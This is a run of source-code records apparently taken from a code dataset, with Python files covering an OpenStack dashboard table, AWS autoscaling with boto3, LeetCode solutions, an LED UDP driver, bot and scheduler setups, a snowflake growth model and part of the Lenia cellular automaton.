tables.Column(compute_tables.get_created_time,\n verbose_name=_(\"Created Time\"),)\n\n class Meta:\n name = \"instances\"\n verbose_name = _(\"Instances\")\n status_columns = [\"status\"]\n table_actions = (AdminInstanceFilterAction,)\n row_class = AdminUpdateRow\n multi_select = False\n template = \"admin/instances/_data_table.html\"\n table_actions_template = \"admin/instances/admin_instance_action.html\"\n row_actions = (compute_tables.StartInstance,\n AdminEditInstance,\n compute_tables.ConsoleLink,\n compute_tables.TogglePause,\n compute_tables.ToggleSuspend,\n MigrateInstance,\n LiveMigrateInstance,\n compute_tables.SoftRebootInstance,\n compute_tables.RebootInstance,\n compute_tables.StopInstance,\n ClusterAdminTerminateInstance,)\n","sub_path":"horizon/openstack_dashboard/dashboards/cluster_admin/instances/tables.py","file_name":"tables.py","file_ext":"py","file_size_in_byte":8766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"348118057","text":"import boto3\n\n#########List running ec2 instances with status#######\nec2 = boto3.resource('ec2')\ninstances = ec2.instances.filter(\n Filters=[{'Name': 'instance-state-name', 'Values': ['running']}]\n)\nfor instance in instances:\n print(instance.id, instance.state)\n\n#########Create launch configuration group#######\nasclient = boto3.client('autoscaling')\nres = asclient.create_launch_configuration(\n LaunchConfigurationName='mylc',\n ImageId='ami-08111162',\n KeyName='mywebkey',\n SecurityGroups=['nixsg'],\n InstanceType='t2.micro'\n)\nprint(res)\n\n#########Create auto-scaling group#######\nres1 = asclient.create_auto_scaling_group(\n AutoScalingGroupName='mygroup',\n LaunchConfigurationName='mylc',\n MinSize=1,\n MaxSize=2,\n DesiredCapacity=1,\n LoadBalancerNames=['nixlb'],\n AvailabilityZones=['us-east-1d', 'us-east-1b']\n)\nprint(res1)\n\n#########Update/Disable auto-scaling group#######\nres1 = asclient.update_auto_scaling_group(\n AutoScalingGroupName='mygroup',\n LaunchConfigurationName='mylc',\n MinSize=0,\n MaxSize=0,\n DesiredCapacity=0,\n AvailabilityZones=['us-east-1d', 'us-east-1b']\n)","sub_path":"BOTO-AWS/B3Src/B3ASG.py","file_name":"B3ASG.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
owen\n\"\"\"\n\n# https://leetcode.com/problems/length-of-longest-fibonacci-subsequence/discuss/152343/C++JavaPython-Check-Pair\n#class Solution(object):\n# def lenLongestFibSubseq(self, A):\n# \"\"\"\n# :type A: List[int]\n# :rtype: int\n# \"\"\"\n# # Brute Force with Set, time O(n^2 log m), m is the max value in A, space O(n)\n# S=set(A) # use a Set structure to determine quickly whether the next term is in the array A or not. \n# res=0\n# n=len(A)\n# for i in range(n):\n# for j in range(i+1,n):\n# cnt=2\n# prev,curr=A[i],A[j] # For each starting pair A[i], A[j],\n# nxt=prev+curr # we maintain the next expected value A[i] + A[j]\n# while nxt in S:\n# prev,curr=curr,nxt # next exsits, then update\n# nxt=prev+curr\n# cnt+=1\n# if cnt>res:\n# res=cnt\n# return res if res>2 else 0 # subsequences are only fibonacci-like if they have length 3 or mor\n \n# https://leetcode.com/problems/length-of-longest-fibonacci-subsequence/solution/# \n#class Solution(object):\n# def lenLongestFibSubseq(self, A):\n# \"\"\"\n# :type A: List[int]\n# :rtype: int\n# \"\"\"\n# # 2d-DP, time O(n^2), space O(n^2)\n# dmap={x:i for i,x in enumerate(A)} \n# n=len(A)\n# res=0\n# dp=[[2]*n for __ in range(n)] # dp[j][k] be the longest path ending in [j, k].\n# for k in range(n):\n# for j in range(k):\n# i=dmap.get(A[k]-A[j], -1) # (i, j) and (j, k) are connected if and only if A[i] + A[j] == A[k]\n# if i!=-1 and i2 else 0\n\nimport collections\nclass Solution(object):\n def lenLongestFibSubseq(self, A):\n \"\"\"\n :type A: List[int]\n :rtype: int\n \"\"\"\n dp = collections.defaultdict(int) # dp[a, b] represents the length of fibo sequence ends up with (a, b)\n S = set(A)\n# res = 0\n for j in range(len(A)):\n for i in range(j):\n if A[j] - A[i] < A[i] and A[j] - A[i] in S:\n dp[A[i], A[j]] = dp.get((A[j] - A[i], A[i]), 2) + 1 # use two seq values as key\n #res = max(res, dp[A[i], A[j]])\n return max(dp.values() or [0])\n \nif __name__==\"__main__\":\n print(Solution().lenLongestFibSubseq([1,2,3,4,5,6,7,8]))\n print(Solution().lenLongestFibSubseq([1,3,7,11,12,14,18]))","sub_path":"873. Length of Longest Fibonacci Subsequence.py","file_name":"873. 
Length of Longest Fibonacci Subsequence.py","file_ext":"py","file_size_in_byte":2816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"305424447","text":"def solve(*coefficients):\n if len(coefficients) == 3:\n a, b, c = int(coefficients[0]), int(coefficients[1]), int(coefficients[2])\n d = b ** 2 - 4 * a * c\n if d > 0:\n x1 = (-b + d ** 0.5) / (2 * a)\n x2 = (-b - d ** 0.5) / (2 * a)\n return x1, x2\n elif d == 0:\n x1 = (-b) / (2 * a)\n return x1\n elif d < 0:\n return 'NULL'\n elif len(coefficients) == 2:\n b, c = coefficients[0], coefficients[1]\n if b != 0:\n x = -c / b\n return x\n else:\n return 'NULL'\n elif len(coefficients) == 1:\n c = coefficients[0]\n if c == 0:\n return c\n else:\n return 'NULL'\n else:\n return 'None'\n\n\nprint(solve(*list(map(int, input().split(' ')))))\n","sub_path":"laba3/t22.5.py","file_name":"t22.5.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"290622484","text":"import logging\nimport socket\n\nimport numpy as np\nimport voluptuous as vol\n\nfrom ledfx.devices import Device\nfrom ledfx.utils import (\n resolve_destination,\n turn_wled_off,\n turn_wled_on,\n wled_identifier,\n wled_power_state,\n)\n\n_LOGGER = logging.getLogger(__name__)\n\n\nclass UDPDevice(Device):\n \"\"\"Generic UDP device support\"\"\"\n\n CONFIG_SCHEMA = vol.Schema(\n {\n vol.Required(\n \"ip_address\",\n description=\"Hostname or IP address of the device\",\n ): str,\n vol.Required(\n \"port\", description=\"Port for the UDP device\"\n ): vol.All(vol.Coerce(int), vol.Range(min=1, max=65535)),\n vol.Required(\n \"pixel_count\",\n description=\"Number of individual pixels\",\n ): vol.All(vol.Coerce(int), vol.Range(min=1)),\n vol.Optional(\n \"include_indexes\",\n description=\"Include the index for every LED\",\n default=False,\n ): bool,\n vol.Optional(\n \"data_prefix\",\n description=\"Data to be appended in hex format\",\n ): str,\n vol.Optional(\n \"data_postfix\",\n description=\"Data to be prepended in hex format\",\n ): str,\n }\n )\n\n def activate(self):\n self.WLEDReceiver = False\n self._sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n # check if ip/hostname resolves okay\n self.device_ip = resolve_destination(self._config[\"ip_address\"])\n\n if not self.device_ip:\n _LOGGER.warning(\n f\"Cannot resolve destination {self._config['ip_address']}, aborting device {self.name} activation. 
Make sure the IP/hostname is correct and device is online.\"\n )\n return\n # If the device is a WLED device, turn it on\n if wled_identifier(self.device_ip, self.name):\n self.WLEDReceiver = True\n self.wled_state = wled_power_state(self.device_ip, self.name)\n if self.wled_state is False:\n turn_wled_on(self.device_ip, self.name)\n super().activate()\n\n def deactivate(self):\n super().deactivate()\n if self.WLEDReceiver is True and self.wled_state is False:\n turn_wled_off(self.device_ip, self.name)\n self._sock = None\n\n @property\n def pixel_count(self):\n return int(self._config[\"pixel_count\"])\n\n def flush(self, data):\n udpData = bytearray()\n byteData = data.astype(np.dtype(\"B\"))\n\n # Append the prefix if provided\n prefix = self._config.get(\"data_prefix\")\n if prefix:\n try:\n udpData.extend(bytes.fromhex(prefix))\n except ValueError:\n _LOGGER.warning(f\"Cannot convert prefix {prefix} to hex value\")\n\n # Append all of the pixel data\n if self._config[\"include_indexes\"]:\n for i in range(len(byteData)):\n udpData.extend(bytes([i]))\n udpData.extend(byteData[i].flatten().tobytes())\n else:\n udpData.extend(byteData.flatten().tobytes())\n\n # Append the postfix if provided\n postfix = self._config.get(\"data_postfix\")\n if postfix:\n try:\n udpData.extend(bytes.fromhex(postfix))\n except ValueError:\n _LOGGER.warning(\n f\"Cannot convert postfix {postfix} to hex value\"\n )\n\n self._sock.sendto(\n bytes(udpData),\n (self.device_ip, self._config[\"port\"]),\n )\n","sub_path":"ledfx/devices/udp.py","file_name":"udp.py","file_ext":"py","file_size_in_byte":3651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"217917763","text":"import cmd, sys\nimport importlib\nimport threading\nimport apibot\nimport clibot\nimport config\n\ndef apibot_process():\n apibot.HoroBot().start()\n\nclass KenOokamiHoroBotShell(cmd.Cmd):\n intro = '@Ken_Ookami_Horo_bot and @Yoitsu_no_Kenro_Horo are here!\\nType \"help\" or \"?\" to get avaliable commands.\\n'\n prompt = '🍎 >>> '\n file = None\n\n def __init__(self):\n cmd.Cmd.__init__(self)\n self.apibot=threading.Thread(target=apibot_process)\n self.clibot=clibot.clibot\n\n\n # ----- basic turtle commands -----\n '''\n To create a command:\n def do_something(self, arg):\n ... 
# do something\n    and you can use it by typing 'something ' in shell.\n    You can also define a 'help_something' function to provide help information.\n    '''\n    def do_bye(self, arg):\n        'Are you ready to be eaten by me 😋 ~'\n        print(\"\\n😋 >>>Nice to eat you~\")\n        return True\n    def do_clibot(self,arg):\n        'send command to clibot 😋\\nusage:clibot {command}'\n        #print(\"DEBUG> [{}]({})\".format(arg,len(arg)))\n        self.clibot.send_command(arg)\n    \n    def cmdloop(self):\n        self.apibot.start()\n        self.clibot.run()\n        cmd.Cmd.cmdloop(self)\n\nif __name__ == '__main__':\n    shell=KenOokamiHoroBotShell()\n    try:\n        shell.cmdloop()\n    except KeyboardInterrupt:\n        print(\"\\n😋 >>>Nice to eat you~\")\n        exit(0)\n","sub_path":"shell.py","file_name":"shell.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"476514008","text":"# // Time Complexity : O(m*n^2) where m is the length of a word and \n# n is the number of words in the wordlist\n# // Space Complexity : O(m*n^2)\n# // Did this code successfully run on Leetcode : \n# // Any problem you faced while coding this : \n\n# // Your code here along with comments explaining your approach \nfrom typing import List\nfrom collections import defaultdict, deque\n\nclass Solution:\n    \n    def get_adjacent_words(self,word):\n        res = []\n        for i in range(len(word)):\n            s = word[:i] + '_' + word[i+1:]\n            res.append(s)\n        return res \n    \n    \n    def ladderLength(self, beginWord: str, endWord: str, wordList: List[str]) -> int:\n        if endWord not in wordList or not wordList: return 0\n        wordDict = defaultdict(list)\n        \n        for word in wordList:\n            adj_words = self.get_adjacent_words(word)\n            for each in adj_words:\n                wordDict[each].append(word)\n        \n        # print(wordDict) \n        \n        # BFS routine\n        \n        queue = deque()\n        queue.append((beginWord,1))\n        visited = set()\n        visited.add(beginWord)\n        \n        while queue:\n            word,level = queue.popleft()\n            if word == endWord: return level\n            adj_words = self.get_adjacent_words(word)\n            for each in adj_words:\n                for list_words in wordDict[each]:\n                    if list_words not in visited:\n                        queue.append((list_words,level+1))\n                        visited.add(list_words)\n        return 0\n    ","sub_path":"len_word_ladder.py","file_name":"len_word_ladder.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"240694198","text":"import pandas as pd\nimport cudf as cudf\nimport blazingsql\n\ndef main():\n    column_names = ['n_nationkey', 'n_name', 'n_regionkey', 'n_comments']\n    column_types = {'n_nationkey': 'int32', 'n_regionkey': 'int64'}\n    nation_df = pd.read_csv(\"data/nation.psv\", delimiter='|', dtype=column_types, names=column_names)\n    nation_df = nation_df[['n_nationkey', 'n_regionkey']]\n\n    nation_gdf = cudf.DataFrame.from_pandas(nation_df)\n    print(nation_gdf)\n\n    with blazingsql.open_connection('/tmp/orchestrator.socket') as connection:\n        print(connection.accessToken)\n        db = connection.Database('main')\n\n        tableA = db.Table('nation', nation_gdf)\n        token, unix_path = db.run_query('select id from main.nation', [tableA])\n        with db.get_result(token, unix_path) as gdfB:\n            print(gdfB)\n\nif __name__ == '__main__':\n    main()\n","sub_path":"python/examples/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"36501107","text":"#coding:utf-8\nimport logging\nfrom datetime import datetime\nfrom apscheduler.schedulers.background import BackgroundScheduler\nfrom 
apscheduler.jobstores.sqlalchemy import SQLAlchemyJobStore\nfrom apscheduler.executors.pool import ThreadPoolExecutor, ProcessPoolExecutor\nfrom message.models import Message\n\ntoday = datetime.now()\nlog = logging.getLogger('apscheduler.executors.default')\nfmt = logging.Formatter('%(levelname)s:%(name)s:%(message)s')\nh = logging.StreamHandler()\nh.setFormatter(fmt)\nlog.addHandler(h)\n\njobstores = {\n 'default': SQLAlchemyJobStore(url='sqlite:///scheduler.sqlite')\n}\nexecutors = {\n 'default': ThreadPoolExecutor(20),\n 'processpool': ProcessPoolExecutor(5)\n}\njob_defaults = {\n 'coalesce': False,\n 'max_instances': 3\n}\n\ndef create_message(list, title, content):\n\tfor i in list:\n\t\tMessage.objects.create(sender='admin', reciver=i, title=title, content=content)\n\n\nscheduler = BackgroundScheduler(jobstores=jobstores, executors=executors, job_defaults=job_defaults, timezone='Asia/Shanghai')","sub_path":"scheduler/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"154387792","text":"from hexagrid import *\nimport time\n\nclass Model():\n def __init__(self, alpha, beta, gamma, mapRadius):\n \"\"\"\n alpha : float (0 <= b <= 1) constante de diffusion\n beta : float (0 <= b <= 1) background vapor level\n gamma : float (0 <= b <= 1) Addition de vapeur\n Initialise le modèle\n \"\"\"\n assert 0 <= beta and beta <= 1, \"Le niveau de vapeur beta doit être compris entre 0 et 1\"\n assert 0 <= gamma and gamma <= 1, \"La constante d'addition de vapeur gamma doit être comprise entre 0 et 1\"\n assert 0 <= alpha and alpha <= 1, \"La constante de diffusion alpha doit être comprise entre 0 et 1\"\n assert mapRadius >= 0, \"Le rayon de la carte doit être positif\"\n\n self.alpha = alpha\n self.beta = beta\n self.gamma = gamma\n\n print(\"Model\", alpha, beta, gamma)\n\n self.hexaMap = HexaMap(mapRadius)\n\n self.step = 0\n\n def InitGrid(self):\n for cell in self.hexaMap.cells.values():\n q,r,s = cell.GetCoords()\n if q == r and r == 0:\n cell.SetState(1)\n else :\n cell.SetState(self.beta)\n self._CellsNewState()\n\n def UpdateGrid(self):\n old = time.time()\n self.step += 1\n\n rec = HexaMap(self.hexaMap.radius)\n nonRec = HexaMap(self.hexaMap.radius)\n\n for cell in self.hexaMap.cells.values():\n q,r,s = cell.GetCoords()\n receptive = self._Receptive(cell)\n #print(cell, receptive)\n if receptive:\n rec[(q,r)] = HexaCell(cell.q, cell.r, cell.state, cell.isEdge)\n nonRec[(q,r)] = HexaCell(cell.q, cell.r, 0, cell.isEdge)\n else :\n rec[(q,r)] = HexaCell(cell.q, cell.r, 0, cell.isEdge)\n nonRec[(q,r)] = HexaCell(cell.q, cell.r, cell.state, cell.isEdge)\n\n for cell in rec.cells.values():\n if cell.state != 0:\n cell.state += self.gamma\n\n for cell in nonRec.cells.values():\n cell.state = 1/2 * cell.state + 1/2 * self._GetNeighborsAverage(cell, nonRec)\n\n\n for qr in self.hexaMap.cells:\n recCell = rec[qr]\n nonRecCell = nonRec[qr]\n q,r = qr\n cell = HexaCell(q,r, nonRecCell.state + recCell.state, recCell.isEdge)\n self.hexaMap.cells[qr] = cell\n \n print(self.step, \":\", time.time() - old, \"s\")\n self._CellsNewState()\n\n def _CellsNewState(self):\n for cell in self.hexaMap.cells.values():\n cell.UpdateState()\n\n def _Receptive(self, hexaCell):\n q,r,s = hexaCell.GetCoords()\n hexaCell = self.hexaMap[q,r]\n if hexaCell.oldState >= 1 :\n return True\n \n for cell in self.hexaMap.GetNeighbors(hexaCell):\n if cell.oldState >= 1:\n return True\n\n return 
False\n\n def _GetNeighborsAverage(self, hexaCell, hexMap):\n somme = 0\n cpt = 0\n for cell in hexMap.GetNeighbors(hexaCell):\n somme += cell.oldState\n cpt += 1\n\n return somme/cpt\n","sub_path":"src/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"633500274","text":"import numpy as np # pip3 install numpy\nimport scipy # pip3 install scipy\nimport scipy.ndimage as snd\nimport reikna.fft, reikna.cluda # pip3 install pyopencl/pycuda, reikna\nfrom PIL import Image, ImageTk, ImageDraw # pip3 install pillow\ntry: import tkinter as tk\nexcept: import Tkinter as tk\nfrom fractions import Fraction\nimport copy, re, itertools, json, csv\nimport os, sys, subprocess, datetime, time\nimport warnings\nwarnings.filterwarnings('ignore', '.*output shape of zoom.*') # suppress warning from snd.zoom()\n\nP2, PIXEL_BORDER = 0,0 # 4,2 3,1 2,1 0,0\nX2, Y2 = 9,9 # 10,9 9,8 8,8 1<<9=512\nPIXEL = 1 << P2; SIZEX, SIZEY = 1 << (X2-P2), 1 << (Y2-P2)\n# PIXEL, PIXEL_BORDER = 1,0; SIZEX, SIZEY = 1280//PIXEL, 720//PIXEL # 720p HD\n# PIXEL, PIXEL_BORDER = 1,0; SIZEX, SIZEY = 1920//PIXEL, 1080//PIXEL # 1080p HD\nMIDX, MIDY = int(SIZEX / 2), int(SIZEY / 2)\nDEF_R = max(min(SIZEX, SIZEY) // 4 //5*5, 13)\nEPSILON = 1e-10\nROUND = 10\nFPS_FREQ = 20\nSTATUS = []\nis_windows = (os.name == 'nt')\n\nclass Board:\n\tdef __init__(self, size=[0,0]):\n\t\tself.names = ['', '', '']\n\t\tself.params = {'R':DEF_R, 'T':10, 'b':[1], 'm':0.1, 's':0.01, 'kn':1, 'gn':1}\n\t\tself.cells = np.zeros(size)\n\n\t@classmethod\n\tdef from_values(cls, names, params, cells):\n\t\tself = cls()\n\t\tself.names = names.copy() if names is not None else None\n\t\tself.params = params.copy() if params is not None else None\n\t\tself.cells = cells.copy() if cells is not None else None\n\t\treturn self\n\n\t@classmethod\n\tdef from_data(cls, data):\n\t\tself = cls()\n\t\tself.names = [data.get('code',''), data.get('name',''), data.get('cname','')]\n\t\tself.params = data.get('params')\n\t\tif self.params:\n\t\t\tself.params = self.params.copy()\n\t\t\tself.params['b'] = Board.st2fracs(self.params['b'])\n\t\tself.cells = data.get('cells')\n\t\tif self.cells:\n\t\t\tif type(self.cells) in [tuple, list]:\n\t\t\t\tself.cells = ''.join(self.cells)\n\t\t\tself.cells = Board.rle2arr(self.cells)\n\t\treturn self\n\n\tdef to_data(self, is_shorten=True):\n\t\trle_st = Board.arr2rle(self.cells, is_shorten)\n\t\tparams2 = self.params.copy()\n\t\tparams2['b'] = Board.fracs2st(params2['b'])\n\t\tdata = {'code':self.names[0], 'name':self.names[1], 'cname':self.names[2], 'params':params2, 'cells':rle_st}\n\t\treturn data\n\n\tdef params2st(self):\n\t\tparams2 = self.params.copy()\n\t\tparams2['b'] = '[' + Board.fracs2st(params2['b']) + ']'\n\t\treturn ','.join(['{}={}'.format(k,str(v)) for (k,v) in params2.items()])\n\n\tdef long_name(self):\n\t\t# return ' | '.join(filter(None, self.names))\n\t\treturn '{0} - {1} {2}'.format(*self.names)\n\n\t@staticmethod\n\tdef arr2rle(A, is_shorten=True):\n\t\t''' RLE = Run-length encoding: \n\t\t\thttp://www.conwaylife.com/w/index.php?title=Run_Length_Encoded\n\t\t\thttp://golly.sourceforge.net/Help/formats.html#rle\n\t\t\thttps://www.rosettacode.org/wiki/Run-length_encoding#Python\n\t\t\t0=b=. 1=o=A 1-24=A-X 25-48=pA-pX 49-72=qA-qX 241-255=yA-yO '''\n\t\tV = np.rint(A*255).astype(int).tolist() # [[255 255] [255 0]]\n\t\tcode_arr = [ [' .' 
if v==0 else ' '+chr(ord('A')+v-1) if v<25 else chr(ord('p')+(v-25)//24) + chr(ord('A')+(v-25)%24) for v in row] for row in V] # [[yO yO] [yO .]]\n\t\tif is_shorten:\n\t\t\trle_groups = [ [(len(list(g)),c.strip()) for c,g in itertools.groupby(row)] for row in code_arr] # [[(2 yO)] [(1 yO) (1 .)]]\n\t\t\tfor row in rle_groups:\n\t\t\t\tif row[-1][1]=='.': row.pop() # [[(2 yO)] [(1 yO)]]\n\t\t\tst = '$'.join(''.join([(str(n) if n>1 else '')+c for n,c in row]) for row in rle_groups) + '!' # \"2 yO $ 1 yO\"\n\t\telse:\n\t\t\tst = '$'.join(''.join(row) for row in code_arr) + '!'\n\t\t# print(sum(sum(r) for r in V))\n\t\treturn st\n\n\t@staticmethod\n\tdef rle2arr(st):\n\t\trle_groups = re.findall('(\\d*)([p-y]?[.boA-X$])', st.rstrip('!')) # [(2 yO)(1 $)(1 yO)]\n\t\tcode_list = sum([[c] * (1 if n=='' else int(n)) for n,c in rle_groups], []) # [yO yO $ yO]\n\t\tcode_arr = [l.split(',') for l in ','.join(code_list).split('$')] # [[yO yO] [yO]]\n\t\tV = [ [0 if c in ['.','b'] else 255 if c=='o' else ord(c)-ord('A')+1 if len(c)==1 else (ord(c[0])-ord('p'))*24+(ord(c[1])-ord('A')+25) for c in row if c!='' ] for row in code_arr] # [[255 255] [255]]\n\t\t# lines = st.rstrip('!').split('$')\n\t\t# rle = [re.findall('(\\d*)([p-y]?[.boA-X])', row) for row in lines]\n\t\t# code = [ sum([[c] * (1 if n=='' else int(n)) for n,c in row], []) for row in rle]\n\t\t# V = [ [0 if c in ['.','b'] else 255 if c=='o' else ord(c)-ord('A')+1 if len(c)==1 else (ord(c[0])-ord('p'))*24+(ord(c[1])-ord('A')+25) for c in row ] for row in code]\n\t\tmaxlen = len(max(V, key=len))\n\t\tA = np.array([row + [0] * (maxlen - len(row)) for row in V])/255 # [[1 1] [1 0]]\n\t\t# print(sum(sum(r) for r in V))\n\t\treturn A\n\n\t@staticmethod\n\tdef fracs2st(B):\n\t\treturn ','.join([str(f) for f in B])\n\n\t@staticmethod\n\tdef st2fracs(st):\n\t\treturn [Fraction(st) for st in st.split(',')]\n\n\tdef clear(self):\n\t\tself.cells.fill(0)\n\n\tdef add(self, part, shift=[0,0]):\n\t\t# assert self.params['R'] == part.params['R']\n\t\th1, w1 = self.cells.shape\n\t\th2, w2 = part.cells.shape\n\t\th, w = min(h1, h2), min(w1, w2)\n\t\ti1, j1 = (w1 - w)//2 + shift[1], (h1 - h)//2 + shift[0]\n\t\ti2, j2 = (w2 - w)//2, (h2 - h)//2\n\t\t# self.cells[j:j+h, i:i+w] = part.cells[0:h, 0:w]\n\t\tvmin = np.amin(part.cells)\n\t\tfor y in range(h):\n\t\t\tfor x in range(w):\n\t\t\t\tif part.cells[j2+y, i2+x] > vmin:\n\t\t\t\t\tself.cells[(j1+y)%h1, (i1+x)%w1] = part.cells[j2+y, i2+x]\n\t\treturn self\n\n\tdef transform(self, tx, mode='RZSF', is_world=False):\n\t\tif 'R' in mode and tx['rotate'] != 0:\n\t\t\tself.cells = snd.rotate(self.cells, tx['rotate'], reshape=not is_world, order=0, mode='wrap' if is_world else 'constant')\n\t\tif 'Z' in mode and tx['R'] != self.params['R']:\n\t\t\t# print('* {} / {}'.format(tx['R'], self.params['R']))\n\t\t\tshape_orig = self.cells.shape\n\t\t\tself.cells = snd.zoom(self.cells, tx['R'] / self.params['R'], order=0)\n\t\t\tif is_world:\n\t\t\t\tself.cells = Board(shape_orig).add(self).cells\n\t\t\tself.params['R'] = tx['R']\n\t\tif 'F' in mode and tx['flip'] != -1:\n\t\t\tif tx['flip'] in [0,1]: self.cells = np.flip(self.cells, axis=tx['flip'])\n\t\t\telif tx['flip'] == 2: self.cells[:, :-MIDX-1:-1] = self.cells[:, :MIDX]\n\t\t\telif tx['flip'] == 3: self.cells[:, :-MIDX-1:-1] = self.cells[::-1, :MIDX]\n\t\tif 'S' in mode and tx['shift'] != [0, 0]:\n\t\t\tself.cells = snd.shift(self.cells, tx['shift'], order=0, mode='wrap')\n\t\t\t# self.cells = np.roll(self.cells, tx['shift'], (1, 0))\n\t\treturn self\n\n\tdef 
add_transformed(self, part, tx):\n\t\tpart = copy.deepcopy(part)\n\t\tself.add(part.transform(tx, mode='RZF'), tx['shift'])\n\t\treturn self\n\n\tdef crop(self):\n\t\tvmin = np.amin(self.cells)\n\t\tcoords = np.argwhere(self.cells > vmin)\n\t\ty0, x0 = coords.min(axis=0)\n\t\ty1, x1 = coords.max(axis=0) + 1\n\t\tself.cells = self.cells[y0:y1, x0:x1]\n\t\treturn self\n\nclass Automaton:\n\tkernel_core = {\n\t\t0: lambda r: (4 * r * (1-r))**4, # polynomial (quad4)\n\t\t1: lambda r: np.exp( 4 - 1 / (r * (1-r)) ), # exponential / gaussian bump (bump4)\n\t\t2: lambda r, q=1/4: (r>=q)*(r<=1-q), # step (stpz1/4)\n\t\t3: lambda r, q=1/4: (r>=q)*(r<=1-q) + (r 0)\n\n\t\tself.m_last_center = self.m_center\n\t\tself.m_last_angle = self.m_angle\n\t\t# self.shape_last_angle = self.shape_angle\n\n\t\tself.inertia = 0\n\t\tself.m_center = None\n\t\tself.g_center = None\n\t\tself.mg_dist = 0\n\t\tself.m_shift = 0\n\t\tself.m_angle = 0\n\t\tself.m_rotate = 0\n\t\tself.mass_asym = 0\n\t\t# self.shape_major_axis = 0\n\t\t# self.shape_minor_axis = 0\n\t\t# self.shape_eccentricity = 0\n\t\t# self.shape_compactness = 0\n\t\t# self.shape_angle = 0\n\t\t# self.shape_rotate = 0 \n\t\tif m00 > EPSILON:\n\t\t\tAX, AY = A*X, A*Y\n\t\t\tm01, m10 = np.sum(AX), np.sum(AY)\n\t\t\tm02, m20 = np.sum(AX*X), np.sum(AY*Y)\n\t\t\tmx, my = self.m_center = np.array([m01, m10]) / m00\n\t\t\tmu02, mu20 = m02 - my * m01, m20 - mx * m10\n\t\t\tself.inertia = (mu20 + mu02) / m00**2\n\t\t\t\n\t\t\t# m11 = np.sum(AY*X)\n\t\t\t# mu11 = m11 - mx * m01\n\t\t\t# m1 = mu20 + mu02\n\t\t\t# m2 = mu20 - mu02\n\t\t\t# m3 = 2 * mu11\n\t\t\t# t1 = m1 / 2 / m00\n\t\t\t# t2 = np.sqrt(m2**2 + m3**2) / 2 / m00\n\t\t\t# self.shape_major_axis = t1 + t2\n\t\t\t# self.shape_minor_axis = t1 - t2\n\t\t\t# self.shape_eccentricity = np.sqrt(1 - self.shape_minor_axis / self.shape_major_axis)\n\t\t\t# self.shape_compactness = m00 / (mu20 + mu02)\n\t\t\t# self.shape_angle = np.degrees(np.arctan2(m2, m3))\n\t\t\t# if self.shape_last_angle is not None:\n\t\t\t\t# self.shape_rotate = self.shape_angle - self.shape_last_angle\n\t\t\t\t# self.shape_rotate = (self.shape_rotate + 540) % 360 - 180\n\n\t\t\tif g00 > EPSILON:\n\t\t\t\tg01, g10 = np.sum(G*X), np.sum(G*Y)\n\t\t\t\tgx, gy = self.g_center = np.array([g01, g10]) / g00\n\t\t\t\tself.mg_dist = np.linalg.norm(self.m_center - self.g_center)\n\n\t\t\tif self.m_last_center is not None and self.m_last_angle is not None:\n\t\t\t\tdm = self.m_center - self.m_last_center + self.last_shift_idx / R\n\t\t\t\tself.m_shift = np.linalg.norm(dm)\n\t\t\t\tself.m_angle = np.degrees(np.arctan2(dm[1], dm[0])) if self.m_shift >= EPSILON else 0\n\t\t\t\tself.m_rotate = self.m_angle - self.m_last_angle\n\t\t\t\tself.m_rotate = (self.m_rotate + 540) % 360 - 180\n\t\t\t\tif self.automaton.gen <= 2:\n\t\t\t\t\tself.m_rotate = 0\n\n\t\t\t\tmidpoint = np.array([MIDX, MIDY])\n\t\t\t\tX, Y = np.meshgrid(np.arange(SIZEX), np.arange(SIZEY))\n\t\t\t\tx0, y0 = self.m_last_center * R + midpoint - self.last_shift_idx\n\t\t\t\tx1, y1 = self.m_center * R + midpoint\n\t\t\t\tsign = (x1 - x0) * (Y - y0) - (y1 - y0) * (X - x0)\n\t\t\t\tself.mass_asym = np.sum(A[sign>0]) - np.sum(A[sign<0])\n\t\t\t\t# self.aaa = A.copy(); self.aaa[sign<0] = 0\n\n\tdef stat_name(self, i=None, x=None):\n\t\tif not x: x = self.STAT_HEADERS[i]\n\t\treturn '{0}={1}'.format(x, self.STAT_NAMES[x])\n\n\tdef new_segment(self):\n\t\tif self.series == [] or self.series[-1] != []:\n\t\t\tself.series.append([])\n\tdef clear_segment(self):\n\t\tif self.series != []:\n\t\t\tif 
